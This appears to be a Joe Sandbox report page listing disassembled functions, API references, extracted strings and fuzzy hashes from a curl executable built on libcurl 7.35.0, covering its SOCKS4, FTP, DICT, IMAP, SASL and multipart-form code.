Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_mvsnprintfmemcpy$ioctlsocketsscanf
String ID: %hu.%hu.%hu.%hu$@$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Connection time-out$Failed to receive SOCKS4 connect request ack.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$SOCKS4 communication to %s:%d$SOCKS4 connect to %s (locally resolved)$SOCKS4 reply has wrong version, version should be 4.$SOCKS4%s request granted.$Too long SOCKS proxy name, can't use!$\
API String ID: 1014430646-1416955213
Opcode ID: fd1fe7771df3f8df0e6d5d10ce787dc2135a97afdb3a2bd1a914addf6a1b3bff
Instruction ID: 647d244043b0c4ce1bbd045fd0aec08e8ee2a38d9de75afc8a4dde6a6c3758c7
Opcode Fuzzy Hash: fd1fe7771df3f8df0e6d5d10ce787dc2135a97afdb3a2bd1a914addf6a1b3bff
Instruction Fuzzy Hash: 36F193B450D3819ED3209F2AC1843AFBBE0AF89348F058C2EE4D887292E779D545DB57

Function 0040D430 Relevance: 33.4, APIs: 5, Strings: 14, Instructions: 182COMMON

Download Yara Rule

APIs

curl_easy_setopt.CURL ref: 0040D44E
free.MSVCRT ref: 0040D58D
free.MSVCRT ref: 0040D5CE
free.MSVCRT ref: 0040D615
free.MSVCRT ref: 0040D662

Part of subcall function 00403420: curl_mvaprintf.CURL ref: 00403433
Part of subcall function 00403420: curl_free.CURL ref: 0040345A

Strings

struct curl_httppost *postend;, xrefs: 0040D691
curl_formadd(&post%d, &postend,, xrefs: 0040D521
post%d = NULL;, xrefs: 0040D4A2, 0040D4DA
CURLFORM_CONTENTTYPE, "%s",, xrefs: 0040D5E9
curl_easy_setopt(hnd, %s, post%d);, xrefs: 0040D6E6
postend = NULL;, xrefs: 0040D4FF
CURLFORM_END);, xrefs: 0040D6BC
struct curl_httppost *post%d;, xrefs: 0040D479
CURLFORM_FILECONTENT, "%s",, xrefs: 0040D567
CURLFORM_FILE, "%s",, xrefs: 0040D673
CURLFORM_COPYCONTENTS, "%s",, xrefs: 0040D63F
curl_formfree(post%d);, xrefs: 0040D4BE
CURLFORM_COPYNAME, "%s",, xrefs: 0040D540
CURLFORM_FILENAME, "%s",, xrefs: 0040D5A8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$curl_easy_setoptcurl_freecurl_mvaprintf
String ID: CURLFORM_CONTENTTYPE, "%s",$ CURLFORM_COPYCONTENTS, "%s",$ CURLFORM_COPYNAME, "%s",$ CURLFORM_END);$ CURLFORM_FILE, "%s",$ CURLFORM_FILECONTENT, "%s",$ CURLFORM_FILENAME, "%s",$curl_easy_setopt(hnd, %s, post%d);$curl_formadd(&post%d, &postend,$curl_formfree(post%d);$post%d = NULL;$postend = NULL;$struct curl_httppost *post%d;$struct curl_httppost *postend;
API String ID: 3952143694-2790129552
Opcode ID: 9177f06e6efa52105a0fb2a92bdad86958de4ee17b898262deecfdb5df4b0c45
Instruction ID: 88eb459308ce9f13449cabb3e43411910526d6b4b9b25aa947db00b87bd4845a
Opcode Fuzzy Hash: 9177f06e6efa52105a0fb2a92bdad86958de4ee17b898262deecfdb5df4b0c45
Instruction Fuzzy Hash: FA6102709047029AC710AFA5C58065BBBE4EE45749F41C83FE9C8AB381E7BDD849CB4B

Function 0042CAD0 Relevance: 31.8, APIs: 6, Strings: 12, Instructions: 291stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0042CD2C
sscanf.MSVCRT ref: 0042CD71

Strings

Skips %d.%d.%d.%d for data connection, uses %s instead, xrefs: 0042CBEA
Can't resolve new host %s:%hu, xrefs: 0042CDE5
%c%c%c%u%c, xrefs: 0042CD66
%d.%d.%d.%d, xrefs: 0042CF2D
Can't resolve proxy host %s:%hu, xrefs: 0042CFD7
0, xrefs: 0042CF35
Illegal port number in EPSV reply, xrefs: 0042CF83
Couldn't interpret the 227-response, xrefs: 0042CE30
%d,%d,%d,%d,%d,%d, xrefs: 0042CBA8
Bad PASV/EPSV response: %03d, xrefs: 0042CB1F
Weirdly formatted EPSV reply, xrefs: 0042CD7F
Connecting to %s (%s) port %d, xrefs: 0042CF08

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: sscanfstrchr
String ID: %c%c%c%u%c$%d,%d,%d,%d,%d,%d$%d.%d.%d.%d$0$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skips %d.%d.%d.%d for data connection, uses %s instead$Weirdly formatted EPSV reply
API String ID: 174233066-2183480311
Opcode ID: 13aa93f277e2662e26083c743a99f758f0c395abbd7e5dc0447f496b5ecebf80
Instruction ID: 23e387c1227c0427a56dca024b1afa758f6e007b96e78c10396357b7b2183274
Opcode Fuzzy Hash: 13aa93f277e2662e26083c743a99f758f0c395abbd7e5dc0447f496b5ecebf80
Instruction Fuzzy Hash: A8D1E6B06097159FC710DF29D18066FBBE0AF85744F55882FF8898B311E738D988CB9A

Function 00431990 Relevance: 31.8, APIs: 8, Strings: 13, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 004319ED
strchr.MSVCRT ref: 00431A0E
strchr.MSVCRT ref: 00431A30
strchr.MSVCRT ref: 00431A52
strchr.MSVCRT ref: 00431C3D
strchr.MSVCRT ref: 00431C58
strchr.MSVCRT ref: 00431C7A

Strings

/FIND:, xrefs: 00431BF8
lookup word is missing, xrefs: 00431B34, 00431C94
CLIENT libcurl 7.35.0MATCH %s %s %sQUIT, xrefs: 00431ABB
CLIENT libcurl 7.35.0DEFINE %s %sQUIT, xrefs: 00431CDB
/LOOKUP:, xrefs: 00431D30
Failed sending DICT request, xrefs: 00431BB3
/D:, xrefs: 00431D10
/M:, xrefs: 00431BD8
CLIENT libcurl 7.35.0%sQUIT, xrefs: 00431B8B
/MATCH:, xrefs: 004319C6
default, xrefs: 00431B46, 00431C9C
/, xrefs: 00431D48
/DEFINE:, xrefs: 00431C18

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr
String ID: /$/D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.35.0%sQUIT$CLIENT libcurl 7.35.0DEFINE %s %sQUIT$CLIENT libcurl 7.35.0MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
API String ID: 2830005266-695038790
Opcode ID: 63d61ac6e91cedb2be160a6f601249170844594ac0e83e9844a22fdb4f48cc55
Instruction ID: 3b39fdc00d09465c8ff3ced40ec24f1fcfff1c8a771b8210b6b13b129fbb6b5a
Opcode Fuzzy Hash: 63d61ac6e91cedb2be160a6f601249170844594ac0e83e9844a22fdb4f48cc55
Instruction Fuzzy Hash: 2BA130702083018FD711AF65C58436BFBE4AF89399F05992EE8C887361E7BDD945CB4A

Function 004354C7 Relevance: 31.7, APIs: 7, Strings: 14, Instructions: 223stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004354F0
memcmp.MSVCRT ref: 00435513
memcmp.MSVCRT ref: 00435546
memcmp.MSVCRT ref: 00435707
memcmp.MSVCRT ref: 00435727
memcmp.MSVCRT ref: 00435750

Part of subcall function 00435430: strlen.MSVCRT ref: 00435444

Strings

UID, xrefs: 0043563A
LSUB, xrefs: 00435626
EXAMINE, xrefs: 004355EE
SELECT, xrefs: 004355DE
STORE, xrefs: 004355C7
BAD, xrefs: 00435745
SEARCH, xrefs: 004355FE
Bad tagged response, xrefs: 004357E0
FETCH, xrefs: 0043556C, 00435808
Unexpected continuation response, xrefs: 00435771
EXPUNGE, xrefs: 00435612
NOOP, xrefs: 0043564E
LIST, xrefs: 0043582E
CAPABILITY, xrefs: 004357B3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcmp$strlen
String ID: BAD$Bad tagged response$CAPABILITY$EXAMINE$EXPUNGE$FETCH$LIST$LSUB$NOOP$SEARCH$SELECT$STORE$UID$Unexpected continuation response
API String ID: 3738950036-2097326043
Opcode ID: b5560e0a9a3971b2cd810e50ecc86a4f7a11c3fb1e715a99081750124b8ee0a9
Instruction ID: 9803fcac379a195cfec2576a3e4c7b28d08c53fdb02c8aac234f6ba14597d8eb
Opcode Fuzzy Hash: b5560e0a9a3971b2cd810e50ecc86a4f7a11c3fb1e715a99081750124b8ee0a9
Instruction Fuzzy Hash: 4B81AD71B087009BD7249F15C09072BBBE1EB89354F48986EE9898F351E73DEC808B4A

Function 004360E1 Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 190COMMON

Download Yara Rule

APIs

curl_strnequal.CURL ref: 004361B1
curl_strnequal.CURL ref: 004361ED
curl_strnequal.CURL ref: 00436255
curl_strnequal.CURL ref: 0043630F

Strings

CRAM-MD5, xrefs: 00436336
PLAIN, xrefs: 00436304
LOGIN, xrefs: 0043629F
AUTH, xrefs: 004361A6, 004361E2
NTLM, xrefs: 004363D3
XOAUTH2, xrefs: 00436405
GSSAPI, xrefs: 004363A1
DIGEST-MD5, xrefs: 0043636F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strnequal
String ID: AUTH$CRAM-MD5$DIGEST-MD5$GSSAPI$LOGIN$NTLM$PLAIN$XOAUTH2
API String ID: 482932555-1089457512
Opcode ID: c7e76a459c90c305dd00fd0659ac0ac4f3d50daa307ff9a0b9eb00f3e043004b
Instruction ID: 2671c6f4393539f44d0835dee9ce7c333a44a9f26e9310bd13513c8d536ca5c1
Opcode Fuzzy Hash: c7e76a459c90c305dd00fd0659ac0ac4f3d50daa307ff9a0b9eb00f3e043004b
Instruction Fuzzy Hash: 93818DB0509702ABD710AF25C18835BFBE4AF88344F12AC1EE9D987391D778E945CB5E

Function 0043B3F0 Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 182COMMON

Download Yara Rule

APIs

curl_strnequal.CURL ref: 0043B4A3
curl_strnequal.CURL ref: 0043B4DF
curl_strnequal.CURL ref: 0043B536
curl_strnequal.CURL ref: 0043B581
curl_strnequal.CURL ref: 0043B5D7
curl_strnequal.CURL ref: 0043B5FF
curl_strnequal.CURL ref: 0043B62E
curl_strnequal.CURL ref: 0043B656
curl_strnequal.CURL ref: 0043B67E
curl_strnequal.CURL ref: 0043B6A6

Strings

CRAM-MD5, xrefs: 0043B5F4
DIGEST-MD5, xrefs: 0043B623
AUTH, xrefs: 0043B498, 0043B4D4
PLAIN, xrefs: 0043B5CC
NTLM, xrefs: 0043B673
XOAUTH2, xrefs: 0043B69B
LOGIN, xrefs: 0043B576
GSSAPI, xrefs: 0043B64B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strnequal
String ID: AUTH$CRAM-MD5$DIGEST-MD5$GSSAPI$LOGIN$NTLM$PLAIN$XOAUTH2
API String ID: 482932555-1089457512
Opcode ID: 4338b7ae38505b6f0c16b5a6fdacedd4a45de30682845d9e0cc49f8d412e1f47
Instruction ID: 7dc03fed4f4a4d7273e72928a8bbd505327b2642568b0fa0d5f461066cbff3fb
Opcode Fuzzy Hash: 4338b7ae38505b6f0c16b5a6fdacedd4a45de30682845d9e0cc49f8d412e1f47
Instruction Fuzzy Hash: 6E7169B0508701ABD7109F26C58436BFBE0EF98348F10981FEAD987351E778D945CB9A

Function 0042FBA9 Relevance: 28.4, APIs: 4, Strings: 12, Instructions: 382stringCOMMON

Download Yara Rule

APIs

curl_easy_unescape.CURL ref: 0042FC5B
strlen.MSVCRT ref: 0042FC7B
strlen.MSVCRT ref: 0042FC85

Strings

Received only partial file: %I64d bytes, xrefs: 0042FF7E
control connection looks dead, xrefs: 004301D2
Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 00430137
ABOR, xrefs: 0042FD60
partial download completed, closing connection, xrefs: 0042FF08
No data was received!, xrefs: 004300B6
N, xrefs: 0042FBDF
Remembering we are in dir "%s", xrefs: 0042FD1A
server did not report OK, got %d, xrefs: 0043005E
QUOT string not accepted: %s, xrefs: 0043015C
Failure sending ABOR command: %s, xrefs: 0043018F
*, xrefs: 0042FEF0

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_easy_unescape
String ID: *$ABOR$Failure sending ABOR command: %s$N$No data was received!$QUOT string not accepted: %s$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
API String ID: 1647907364-2786370603
Opcode ID: 7ddcdcf593d5ba04ca9ec3ff9139011e44fac04171af657c5a84ff18d7560037
Instruction ID: dae43ee951367dc4a17ca86f8085094f0f51c03ea671926156d06db104c06932
Opcode Fuzzy Hash: 7ddcdcf593d5ba04ca9ec3ff9139011e44fac04171af657c5a84ff18d7560037
Instruction Fuzzy Hash: 670258B06087119BD714DF25D58475BB7F0BF88708F858A3EE9988B351D778E848CB8A

Function 004127E0 Relevance: 28.4, APIs: 4, Strings: 12, Instructions: 367COMMON

Download Yara Rule

Strings

Content-Type: multipart/mixed, boundary=%s, xrefs: 0041297F
--%s--, xrefs: 00412AA3
--%sContent-Disposition: attachment, xrefs: 004129C4
Content-Type: %s, xrefs: 00412A19
%s; boundary=%s, xrefs: 00412853
Content-Type: multipart/form-data, xrefs: 00412846
--%s--, xrefs: 00412A65
couldn't open file "%s", xrefs: 00412D5D
--%s, xrefs: 004128C1
Content-Disposition: form-data; name=", xrefs: 004128E3
%s, xrefs: 00412B1A
, xrefs: 00412B95

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintfcurl_mvsnprintf
String ID: $%s$--%sContent-Disposition: attachment$--%s--$--%s--$Content-Type: %s$Content-Type: multipart/mixed, boundary=%s$%s; boundary=%s$--%s$Content-Disposition: form-data; name="$Content-Type: multipart/form-data$couldn't open file "%s"
API String ID: 3393423334-1859417424
Opcode ID: 7f809139fb753eb78c835779245cfa5254103e9ff3be26cf5e02038bc191ab0e
Instruction ID: f5513a6b1faf331b0613be57abf9fcd2dadb7cfc254ae1e68e3c2c90bb42f0e5
Opcode Fuzzy Hash: 7f809139fb753eb78c835779245cfa5254103e9ff3be26cf5e02038bc191ab0e
Instruction Fuzzy Hash: C2F1D9B46087418FD710DF29D68469BBBE4BF98744F01881EE988D7321E7B8D895CB4A

Function 00446D01 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 282COMMON

Download Yara Rule

APIs

isalnum.MSVCRT ref: 00446D0B

Strings

graph, xrefs: 0044720B
digit, xrefs: 0044719D
HmD, xrefs: 00446D22, 00447327
xdigit, xrefs: 004471DF
alpha, xrefs: 004471C9
space, xrefs: 00447221
blank, xrefs: 00447237
lower, xrefs: 00447263
upper, xrefs: 0044724D
alnum, xrefs: 004471B3
print, xrefs: 004471F5

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: isalnum
String ID: HmD$alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
API String ID: 4166306077-3802135720
Opcode ID: f1fe05005d37b37f43504a0e88bb5942bf45324aad1f521e21f2c73b4ea530b2
Instruction ID: 4e85f8a4dbc991650eebc82629cc72c4fb849842d28306d9211fc19e51e9dc3f
Opcode Fuzzy Hash: f1fe05005d37b37f43504a0e88bb5942bf45324aad1f521e21f2c73b4ea530b2
Instruction Fuzzy Hash: 6CB1957160C3918AF7218E14D4443BB7BD2AB91304F4A485FE8C95B381D7BE998AC79B

Function 00401C70 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 230fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00401CC7
isalpha.MSVCRT ref: 00401D40
memcmp.MSVCRT ref: 00401D74

Strings

Content-disposition:, xrefs: 00401CF2
\, xrefs: 00401E63
filename=, xrefs: 00401D69
;, xrefs: 00401F60

Memory Dump Source

Source File: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fwriteisalphamemcmp
String ID: ;$Content-disposition:$\$filename=
API String ID: 1822330620-1215645570
Opcode ID: 7b52336093479c0cf99b008b026a4372f45880d059e3d77947adb141cf8142e2
Instruction ID: 66cd9ab6da2ef7a5c3ddd54b7f8a2a4a9ae5b84bfe72a1c8f26cfbe8ff2bd257
Opcode Fuzzy Hash: 7b52336093479c0cf99b008b026a4372f45880d059e3d77947adb141cf8142e2
Instruction Fuzzy Hash: D09161706083458FD710DF25C48476BBBE1AF95344F04886FF8849B3A2D779E989CB96

Function 0045209A Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 176networkCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 004521B0
send.WS2_32 ref: 004521D0
WSAGetLastError.WS2_32 ref: 004521DD
curl_msnprintf.CURL ref: 00452269

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

sscanf.MSVCRT ref: 004522B3
curl_msnprintf.CURL ref: 004522FB
curl_msnprintf.CURL ref: 00452337
send.WS2_32 ref: 0045235A
WSAGetLastError.WS2_32 ref: 00452367

Strings

%c%s%c%s, xrefs: 004522F0
%c%c, xrefs: 0045232C
%c%c%c%c, xrefs: 00452256
Sending data failed (%d), xrefs: 004521E3, 0045236D
%c%c%c%c%s%c%c, xrefs: 0045219D
%127[^,],%127s, xrefs: 004522AB
', xrefs: 0045223E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintf$ErrorLastsend$curl_mvsnprintfsscanf
String ID: %127[^,],%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s%c%s$'$Sending data failed (%d)
API String ID: 1943332807-466951607
Opcode ID: c88cc4fa616b7003b613ba5c89c79c3defc0df773ba81939d53c661b71fa25b2
Instruction ID: 208c229836f13472c00058f4268699f878bbe228366ba8bcbfc3b4ea427ef4ce
Opcode Fuzzy Hash: c88cc4fa616b7003b613ba5c89c79c3defc0df773ba81939d53c661b71fa25b2
Instruction Fuzzy Hash: 0A811CB49083059FD710DF24C48479ABBE4FF85354F00897EE8889B252D7B99A89CF86

Function 00423F20 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 154COMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 00423F7A

